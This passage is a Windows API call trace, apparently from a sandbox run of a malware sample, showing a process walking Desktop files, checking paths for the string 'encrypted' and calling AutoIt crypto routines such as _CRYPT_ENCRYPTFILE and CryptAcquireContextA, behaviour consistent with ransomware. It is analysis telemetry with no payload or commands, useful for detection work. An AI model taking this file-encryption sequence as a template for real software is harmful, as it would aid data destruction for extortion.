lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e39500, ftCreationTime.dwHighDateTime=0x1d5b837, ftLastAccessTime.dwLowDateTime=0xd73a5b0, ftLastAccessTime.dwHighDateTime=0x1d5b641, ftLastWriteTime.dwLowDateTime=0xd73a5b0, ftLastWriteTime.dwHighDateTime=0x1d5b641, nFileSizeHigh=0x0, nFileSizeLow=0x6c09, dwReserved0=0x0, dwReserved1=0x777648, cFileName="xLjsIUwe53RPsLj_a.wav", cAlternateFileName="XLJSIU~1.WAV")) returned 0x7c20c0 [0031.616] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.616] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.616] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e39500, ftCreationTime.dwHighDateTime=0x1d5b837, ftLastAccessTime.dwLowDateTime=0xd73a5b0, ftLastAccessTime.dwHighDateTime=0x1d5b641, ftLastWriteTime.dwLowDateTime=0xd73a5b0, ftLastWriteTime.dwHighDateTime=0x1d5b641, nFileSizeHigh=0x0, nFileSizeLow=0x6c09, dwReserved0=0x0, dwReserved1=0x777648, cFileName="xLjsIUwe53RPsLj_a.wav", cAlternateFileName="XLJSIU~1.WAV")) returned 0x7c20c0 [0031.616] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.616] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.617] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lK15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="15Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vz5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xLjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LjsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jsIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sIUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IUwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uwe53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="we53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="53RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RPsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PsLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sLj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lj_a.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.618] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.619] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.619] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.619] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.619] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.619] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.619] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.619] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.619] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e39500, ftCreationTime.dwHighDateTime=0x1d5b837, ftLastAccessTime.dwLowDateTime=0xd73a5b0, ftLastAccessTime.dwHighDateTime=0x1d5b641, ftLastWriteTime.dwLowDateTime=0xd73a5b0, ftLastWriteTime.dwHighDateTime=0x1d5b641, nFileSizeHigh=0x0, nFileSizeLow=0x6c09, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="xLjsIUwe53RPsLj_a.wav", cAlternateFileName="XLJSIU~1.WAV")) returned 0x7c2240 [0031.619] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.619] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.619] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.619] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.619] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.619] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.620] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.620] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.620] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.620] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.620] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.620] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.620] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0031.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.620] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0031.621] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.621] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.621] 